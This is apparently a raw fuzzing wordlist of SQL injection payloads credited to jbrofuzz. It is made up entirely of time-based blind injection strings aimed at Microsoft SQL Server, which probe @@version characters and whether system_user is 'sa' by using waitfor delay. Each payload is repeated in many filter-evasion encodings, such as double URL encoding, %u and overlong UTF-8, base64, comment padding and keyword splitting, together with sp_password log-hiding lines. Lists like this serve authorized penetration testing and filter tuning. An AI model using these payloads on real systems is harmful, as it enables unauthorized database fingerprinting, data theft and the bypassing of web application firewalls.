# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)
%00
IyBjb250YWlucyBzdGF0ZW1lbnRzIGZyb20gamJyb2Z1enogKDEzIEFwcmlsIDIwMTApCg==
# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

%2523%2520%2563%256F%256E%2574%2561%2569%256E%2573%2520%2573%2574%2561%2574%2565%256D%2565%256E%2574%2573%2520%2566%2572%256F%256D%2520%256A%2562%2572%256F%2566%2575%257A%257A%2520%2528%2531%2533%2520%2541%2570%2572%2569%256C%2520%2532%2530%2531%2530%2529%250A
%23%20%63%6F%6E%74%61%69%6E%73%20%73%74%61%74%65%6D%65%6E%74%73%20%66%72%6F%6D%20%6A%62%72%6F%66%75%7A%7A%20%28%31%33%20%41%70%72%69%6C%20%32%30%31%30%29%0A
%u0023%u0020%u0063%u006F%u006E%u0074%u0061%u0069%u006E%u0073%u0020%u0073%u0074%u0061%u0074%u0065%u006D%u0065%u006E%u0074%u0073%u0020%u0066%u0072%u006F%u006D%u0020%u006A%u0062%u0072%u006F%u0066%u0075%u007A%u007A%u0020%u0028%u0031%u0033%u0020%u0041%u0070%u0072%u0069%u006C%u0020%u0032%u0030%u0031%u0030%u0029%u000A
# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements FRFROMOM jbrofuzz (13 April 2010)

%C0%AB%C0%AAcontains%C0%AAstatements%C0%AAfrom%C0%AAjbrofuzz%C0%AA%C0%AA13%C0%AAApril%C0%AA2010%C0%AB%C0%8A
%# %c%o%n%t%a%i%n%s %s%t%a%t%e%m%e%n%t%s %f%r%o%m %j%b%r%o%f%u%z%z %(%1%3 %A%p%r%i%l %2%0%1%0%)%

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)
 and '0having'='0having'
# contains statements from jbrofuzz (13 April 2010)
sp_password
#/**/contains/**/statements/**/from/**/jbrofuzz/**/(13/**/April/**/2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

#%07contains%0Astatements%01from%04jbrofuzz%04(13%01April%0D2010)

# contains statements from jbrofuzz (13 April 2010)

#%09contains%09statements%09from%0Djbrofuzz%0B(13%0AApril%092010)

# contains statements from jbrofuzz (13 April 2010)

#+contains+statements+from+jbrofuzz+(13+April+2010)

#%0Dcontains%09statements%0Cfrom%09jbrofuzz%0A(13%09April%0C2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

# contains statements from jbrofuzz (13 April 2010)

%EF%BC%87; if not(substring((select @@version),25,1) <> 0) waitfor delay %EF%BC%870:0:2%EF%BC%87 --

%00%27; if not(substring((select @@version),25,1) <> 0) waitfor delay %00%270:0:2%00%27 --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
%00
JzsgaWYgbm90KHN1YnN0cmluZygoc2VsZWN0IEBAdmVyc2lvbiksMjUsMSkgPD4gMCkgd2FpdGZvciBkZWxheSAnMDowOjInIC0tCg==
'; if not(substring((select @@version),25,1) < NOT BETWEEN 0 AND 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

%2527%253B%2520%2569%2566%2520%256E%256F%2574%2528%2573%2575%2562%2573%2574%2572%2569%256E%2567%2528%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%252C%2532%2535%252C%2531%2529%2520%253C%253E%2520%2530%2529%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%250A
%27%3B%20%69%66%20%6E%6F%74%28%73%75%62%73%74%72%69%6E%67%28%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%2C%32%35%2C%31%29%20%3C%3E%20%30%29%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u006E%u006F%u0074%u0028%u0073%u0075%u0062%u0073%u0074%u0072%u0069%u006E%u0067%u0028%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u002C%u0032%u0035%u002C%u0031%u0029%u0020%u003C%u003E%u0020%u0030%u0029%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u000A
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; /*!30459if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' */--

'; /*!00000if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' */--

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((SSELECTELECT @@version),25,1) <> 0) waitfor delay '0:0:2' --

%C0%AF%C0%BB%C0%AAif%C0%AAnot%C0%AAsubstring%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AE25%C0%AE1%C0%AB%C0%AA%C0%BE%C0%BE%C0%AA0%C0%AB%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%; %i%f %n%o%t%(%s%u%b%s%t%r%i%n%g%(%(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%,%2%5%,%1%) %<%> %0%) %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%-%

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
 and '0having'='0having'
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
-- sp_password
';/**/if/**/not(substring((select/**/@@version),25,1)/**/<>/**/0)/**/waitfor/**/delay/**/'0:0:2'/**/--

';--bOaNKO%0Aif--ujfrdpl%0Anot(substring((select--TymdOHcuZlh%0A@@version),25,1)--cQTFTTscXDt%0A<>--UvfHUWRZIwP%0A0)--TRjfkQeUSjY%0Awaitfor--ejzsuWuRB%0Adelay--TIdeuqCBnh%0A'0:0:2'--fwCKHQ%0A----CYIfPnRnBlX%0A
';%23LYntfZAtE%0Aif%23UlAUpmGdV%0Anot(substring((select%23MthNOkC%0A@@version),25,1)%23SBMANzl%0A<>%23HbVIRHIzEB%0A0)%23OhtipyqHgu%0Awaitfor%23TGXBgiRDdrx%0Adelay%23PrOihqyCVy%0A'0:0:2'%23VvdVNv%0A--%23dJtucyeCzOkM%0A
';%23eqRCHQQSrNdt%0Aif%23zupzBX%0Anot(substring((select%23rOXFwZkNYkv%0A@@version),25,1)%23IUlicTQknnr%0A<>%23brBOarSgE%0A0)%23yjQSSeeizoc%0Awaitfor%23SLlTnzvCQVJ%0Adelay%23RXesDgFYiWn%0A'0:0:2'%23aGBFQhvV%0A--%23quSqcjUDq%0A
';%0Fif%08not(substring((select%07@@version),25,1)%01<>%0A0)%0Bwaitfor%0Bdelay%09'0:0:2'%08--

';%23%0Aif%23%0Anot(substring((select%23%0A@@version),25,1)%23%0A<>%23%0A0)%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A--%23%0A
';%09if%0Anot(substring((select%0C@@version),25,1)%0D<>%0C0)%09waitfor%09delay%0D'0:0:2'%0A--

';--%0Aif--%0Anot(substring((select--%0A@@version),25,1)--%0A<>--%0A0)--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A----%0A
';+if+not(substring((select+@@version),25,1)+<>+0)+waitfor+delay+'0:0:2'+--

';%09if%0Cnot(substring((select%0A@@version),25,1)%0D<>%0A0)%0Dwaitfor%0Adelay%0C'0:0:2'%0D--

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

%bf%27; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --

%EF%BC%87; if not(substring((select @@version),25,1) <> 5) waitfor delay %EF%BC%870:0:2%EF%BC%87 --

%00%27; if not(substring((select @@version),25,1) <> 5) waitfor delay %00%270:0:2%00%27 --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
%00
JzsgaWYgbm90KHN1YnN0cmluZygoc2VsZWN0IEBAdmVyc2lvbiksMjUsMSkgPD4gNSkgd2FpdGZvciBkZWxheSAnMDowOjInIC0tCg==
'; if not(substring((select @@version),25,1) < NOT BETWEEN 0 AND 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

%2527%253B%2520%2569%2566%2520%256E%256F%2574%2528%2573%2575%2562%2573%2574%2572%2569%256E%2567%2528%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%252C%2532%2535%252C%2531%2529%2520%253C%253E%2520%2535%2529%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%250A
%27%3B%20%69%66%20%6E%6F%74%28%73%75%62%73%74%72%69%6E%67%28%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%2C%32%35%2C%31%29%20%3C%3E%20%35%29%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u006E%u006F%u0074%u0028%u0073%u0075%u0062%u0073%u0074%u0072%u0069%u006E%u0067%u0028%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u002C%u0032%u0035%u002C%u0031%u0029%u0020%u003C%u003E%u0020%u0035%u0029%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u000A
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; /*!30523if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' */--

'; /*!00000if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' */--

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((SESELECTLECT @@version),25,1) <> 5) waitfor delay '0:0:2' --

%C0%AF%C0%BB%C0%AAif%C0%AAnot%C0%AAsubstring%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AE25%C0%AE1%C0%AB%C0%AA%C0%BE%C0%BE%C0%AA5%C0%AB%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%; %i%f %n%o%t%(%s%u%b%s%t%r%i%n%g%(%(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%,%2%5%,%1%) %<%> %5%) %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%-%

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
 and '0having'='0having'
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
-- sp_password
';/**/if/**/not(substring((select/**/@@version),25,1)/**/<>/**/5)/**/waitfor/**/delay/**/'0:0:2'/**/--

';--bhTFBYuQG%0Aif--HsIXwHSJxvH%0Anot(substring((select--hRMEJgGOx%0A@@version),25,1)--zIaBOT%0A<>--QwxRFFKjEsC%0A5)--cylWdJnsWcyS%0Awaitfor--XApqdNhT%0Adelay--BqtBAoPNXS%0A'0:0:2'--lUmYhwph%0A----sWtkelUaD%0A
';%23AajVeqZsef%0Aif%23xDbIITJ%0Anot(substring((select%23rixWgR%0A@@version),25,1)%23tXShqcgErL%0A<>%23czKNttTOjtR%0A5)%23QcgWfDbv%0Awaitfor%23qwHXGFm%0Adelay%23bUFicv%0A'0:0:2'%23OVTZWKAnpKy%0A--%23fdBwRar%0A
';%23aZGxeXcD%0Aif%23RdcMfMHr%0Anot(substring((select%23DuXzev%0A@@version),25,1)%23irLBWoko%0A<>%23QNbujZVeFuIQ%0A5)%23MIIxONSa%0Awaitfor%23PEhnlMBKgyz%0Adelay%23xTwdwyXrfF%0A'0:0:2'%23futGRrZ%0A--%23fpYrnlohk%0A
';%0Aif%02not(substring((select%0F@@version),25,1)%0A<>%095)%0Cwaitfor%02delay%0B'0:0:2'%0C--

';%23%0Aif%23%0Anot(substring((select%23%0A@@version),25,1)%23%0A<>%23%0A5)%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A--%23%0A
';%0Aif%0Dnot(substring((select%0D@@version),25,1)%09<>%0B5)%0Bwaitfor%0Cdelay%0C'0:0:2'%0C--

';--%0Aif--%0Anot(substring((select--%0A@@version),25,1)--%0A<>--%0A5)--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A----%0A
';+if+not(substring((select+@@version),25,1)+<>+5)+waitfor+delay+'0:0:2'+--

';%0Aif%0Anot(substring((select%0D@@version),25,1)%0C<>%0D5)%0Awaitfor%0Adelay%09'0:0:2'%0A--

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

%bf%27; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --

%EF%BC%87; if not(substring((select @@version),25,1) <> 8) waitfor delay %EF%BC%870:0:2%EF%BC%87 --

%00%27; if not(substring((select @@version),25,1) <> 8) waitfor delay %00%270:0:2%00%27 --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
%00
JzsgaWYgbm90KHN1YnN0cmluZygoc2VsZWN0IEBAdmVyc2lvbiksMjUsMSkgPD4gOCkgd2FpdGZvciBkZWxheSAnMDowOjInIC0tCg==
'; if not(substring((select @@version),25,1) < NOT BETWEEN 0 AND 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

%2527%253B%2520%2569%2566%2520%256E%256F%2574%2528%2573%2575%2562%2573%2574%2572%2569%256E%2567%2528%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%252C%2532%2535%252C%2531%2529%2520%253C%253E%2520%2538%2529%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%250A
%27%3B%20%69%66%20%6E%6F%74%28%73%75%62%73%74%72%69%6E%67%28%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%2C%32%35%2C%31%29%20%3C%3E%20%38%29%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u006E%u006F%u0074%u0028%u0073%u0075%u0062%u0073%u0074%u0072%u0069%u006E%u0067%u0028%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u002C%u0032%u0035%u002C%u0031%u0029%u0020%u003C%u003E%u0020%u0038%u0029%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u000A
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; /*!30543if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' */--

'; /*!00000if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' */--

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((SELSELECTECT @@version),25,1) <> 8) waitfor delay '0:0:2' --

%C0%AF%C0%BB%C0%AAif%C0%AAnot%C0%AAsubstring%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AE25%C0%AE1%C0%AB%C0%AA%C0%BE%C0%BE%C0%AA8%C0%AB%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%; %i%f %n%o%t%(%s%u%b%s%t%r%i%n%g%(%(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%,%2%5%,%1%) %<%> %8%) %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%-%

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
 and '0having'='0having'
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
-- sp_password
';/**/if/**/not(substring((select/**/@@version),25,1)/**/<>/**/8)/**/waitfor/**/delay/**/'0:0:2'/**/--

';--TRBmHc%0Aif--CqgsRzgbC%0Anot(substring((select--ClMuEvGLZC%0A@@version),25,1)--dAhIsrYG%0A<>--OAMLjZ%0A8)--KsFVobCdQ%0Awaitfor--uNvYHYRvi%0Adelay--yRHmTENVxFS%0A'0:0:2'--OtkcKq%0A----WmFtpCbe%0A
';%23UhcImeBCv%0Aif%23utzEXg%0Anot(substring((select%23CJZBfhSRjrZ%0A@@version),25,1)%23hFyFaG%0A<>%23zHWcTRkb%0A8)%23DmHluwUkFeqN%0Awaitfor%23doRRAYuww%0Adelay%23eTWCmgFWNA%0A'0:0:2'%23kveXUySaiXeW%0A--%23qmjgOAUCxs%0A
';%23NXEMQOhlZpYt%0Aif%23dUcOsqpAnLF%0Anot(substring((select%23mhziYFQ%0A@@version),25,1)%23GwwvmjX%0A<>%23GZKtTZKfRM%0A8)%23jIEpmfKbVQyG%0Awaitfor%23UshWtddw%0Adelay%23QKyOUuk%0A'0:0:2'%23oaAkpGGySR%0A--%23QZnSUeycRlu%0A
';%0Cif%0Dnot(substring((select%0C@@version),25,1)%0C<>%058)%05waitfor%04delay%0A'0:0:2'%06--

';%23%0Aif%23%0Anot(substring((select%23%0A@@version),25,1)%23%0A<>%23%0A8)%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A--%23%0A
';%0Aif%0Dnot(substring((select%09@@version),25,1)%0B<>%098)%0Bwaitfor%0Adelay%0C'0:0:2'%09--

';--%0Aif--%0Anot(substring((select--%0A@@version),25,1)--%0A<>--%0A8)--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A----%0A
';+if+not(substring((select+@@version),25,1)+<>+8)+waitfor+delay+'0:0:2'+--

';%0Aif%0Cnot(substring((select%0A@@version),25,1)%0C<>%098)%0Dwaitfor%0Cdelay%0A'0:0:2'%0A--

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

%bf%27; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --

%EF%BC%87; if not(substring((select @@version),24,1) <> 1) waitfor delay %EF%BC%870:0:2%EF%BC%87 --

%00%27; if not(substring((select @@version),24,1) <> 1) waitfor delay %00%270:0:2%00%27 --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
%00
JzsgaWYgbm90KHN1YnN0cmluZygoc2VsZWN0IEBAdmVyc2lvbiksMjQsMSkgPD4gMSkgd2FpdGZvciBkZWxheSAnMDowOjInIC0tCg==
'; if not(substring((select @@version),24,1) < NOT BETWEEN 0 AND 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

%2527%253B%2520%2569%2566%2520%256E%256F%2574%2528%2573%2575%2562%2573%2574%2572%2569%256E%2567%2528%2528%2573%2565%256C%2565%2563%2574%2520%2540%2540%2576%2565%2572%2573%2569%256F%256E%2529%252C%2532%2534%252C%2531%2529%2520%253C%253E%2520%2531%2529%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%250A
%27%3B%20%69%66%20%6E%6F%74%28%73%75%62%73%74%72%69%6E%67%28%28%73%65%6C%65%63%74%20%40%40%76%65%72%73%69%6F%6E%29%2C%32%34%2C%31%29%20%3C%3E%20%31%29%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u006E%u006F%u0074%u0028%u0073%u0075%u0062%u0073%u0074%u0072%u0069%u006E%u0067%u0028%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0040%u0040%u0076%u0065%u0072%u0073%u0069%u006F%u006E%u0029%u002C%u0032%u0034%u002C%u0031%u0029%u0020%u003C%u003E%u0020%u0031%u0029%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u000A
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; /*!30620if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' */--

'; /*!00000if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' */--

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((SELESELECTCT @@version),24,1) <> 1) waitfor delay '0:0:2' --

%C0%AF%C0%BB%C0%AAif%C0%AAnot%C0%AAsubstring%C0%AA%C0%AAselect%C0%AA%C0%CA%C0%CAversion%C0%AB%C0%AE24%C0%AE1%C0%AB%C0%AA%C0%BE%C0%BE%C0%AA1%C0%AB%C0%AAwaitfor%C0%AAdelay%C0%AA%C0%AF0%C0%BA0%C0%BA2%C0%AF%C0%AA%C0%AF%C0%AF%C0%8A
%'%; %i%f %n%o%t%(%s%u%b%s%t%r%i%n%g%(%(%s%e%l%e%c%t %@%@%v%e%r%s%i%o%n%)%,%2%4%,%1%) %<%> %1%) %w%a%i%t%f%o%r %d%e%l%a%y %'%0%:%0%:%2%' %-%-%

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
 and '0having'='0having'
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
-- sp_password
';/**/if/**/not(substring((select/**/@@version),24,1)/**/<>/**/1)/**/waitfor/**/delay/**/'0:0:2'/**/--

';--lmkYCn%0Aif--ElykOQFtF%0Anot(substring((select--RceWpwpDHscD%0A@@version),24,1)--CJqcMWj%0A<>--ibevxfEMADI%0A1)--HgJvcKo%0Awaitfor--jqOfSdE%0Adelay--enryzWtOp%0A'0:0:2'--QnaihWZtgSjf%0A----fHvvVLMNAW%0A
';%23stIMDtD%0Aif%23YAjNjlQc%0Anot(substring((select%23OhrHWpLCxRNa%0A@@version),24,1)%23gxvaFwke%0A<>%23cMSfMNyDVrkj%0A1)%23GNWaQFShm%0Awaitfor%23XgKrtJv%0Adelay%23fULSWmPft%0A'0:0:2'%23bKJBGxMtmxPA%0A--%23EqfTTtjGQ%0A
';%23MHIunoGs%0Aif%23oKwMlPYup%0Anot(substring((select%23jCDgJL%0A@@version),24,1)%23rqwLFgk%0A<>%23akgCvHvQc%0A1)%23JlGpeCDDJK%0Awaitfor%23pXdqCUXJo%0Adelay%23labrFfTSf%0A'0:0:2'%23JthtuKMFY%0A--%23tOXoks%0A
';%0Aif%08not(substring((select%01@@version),24,1)%09<>%031)%07waitfor%03delay%06'0:0:2'%02--

';%23%0Aif%23%0Anot(substring((select%23%0A@@version),24,1)%23%0A<>%23%0A1)%23%0Awaitfor%23%0Adelay%23%0A'0:0:2'%23%0A--%23%0A
';%09if%0Cnot(substring((select%09@@version),24,1)%0A<>%0C1)%0Cwaitfor%0Bdelay%0B'0:0:2'%0D--

';--%0Aif--%0Anot(substring((select--%0A@@version),24,1)--%0A<>--%0A1)--%0Awaitfor--%0Adelay--%0A'0:0:2'--%0A----%0A
';+if+not(substring((select+@@version),24,1)+<>+1)+waitfor+delay+'0:0:2'+--

';%09if%0Dnot(substring((select%0C@@version),24,1)%0D<>%0A1)%09waitfor%09delay%0D'0:0:2'%09--

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

%bf%27; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --

%EF%BC%87; if not(select system_user) <> %EF%BC%87sa%EF%BC%87 waitfor delay %EF%BC%870:0:2%EF%BC%87 --

%00%27; if not(select system_user) <> %00%27sa%00%27 waitfor delay %00%270:0:2%00%27 --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
%00
JzsgaWYgbm90KHNlbGVjdCBzeXN0ZW1fdXNlcikgPD4gJ3NhJyB3YWl0Zm9yIGRlbGF5ICcwOjA6MicgLS0K
'; if not(select system_user) < NOT BETWEEN 0 AND 'sa' waitfor delay '0:0:2' --

'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --

%2527%253B%2520%2569%2566%2520%256E%256F%2574%2528%2573%2565%256C%2565%2563%2574%2520%2573%2579%2573%2574%2565%256D%255F%2575%2573%2565%2572%2529%2520%253C%253E%2520%2527%2573%2561%2527%2520%2577%2561%2569%2574%2566%256F%2572%2520%2564%2565%256C%2561%2579%2520%2527%2530%253A%2530%253A%2532%2527%2520%252D%252D%250A
%27%3B%20%69%66%20%6E%6F%74%28%73%65%6C%65%63%74%20%73%79%73%74%65%6D%5F%75%73%65%72%29%20%3C%3E%20%27%73%61%27%20%77%61%69%74%66%6F%72%20%64%65%6C%61%79%20%27%30%3A%30%3A%32%27%20%2D%2D%0A
%u0027%u003B%u0020%u0069%u0066%u0020%u006E%u006F%u0074%u0028%u0073%u0065%u006C%u0065%u0063%u0074%u0020%u0073%u0079%u0073%u0074%u0065%u006D%u005F%u0075%u0073%u0065%u0072%u0029%u0020%u003C%u003E%u0020%u0027%u0073%u0061%u0027%u0020%u0077%u0061%u0069%u0074%u0066%u006F%u0072%u0020%u0064%u0065%u006C%u0061%u0079%u0020%u0027%u0030%u003A%u0030%u003A%u0032%u0027%u0020%u002D%u002D%u000A
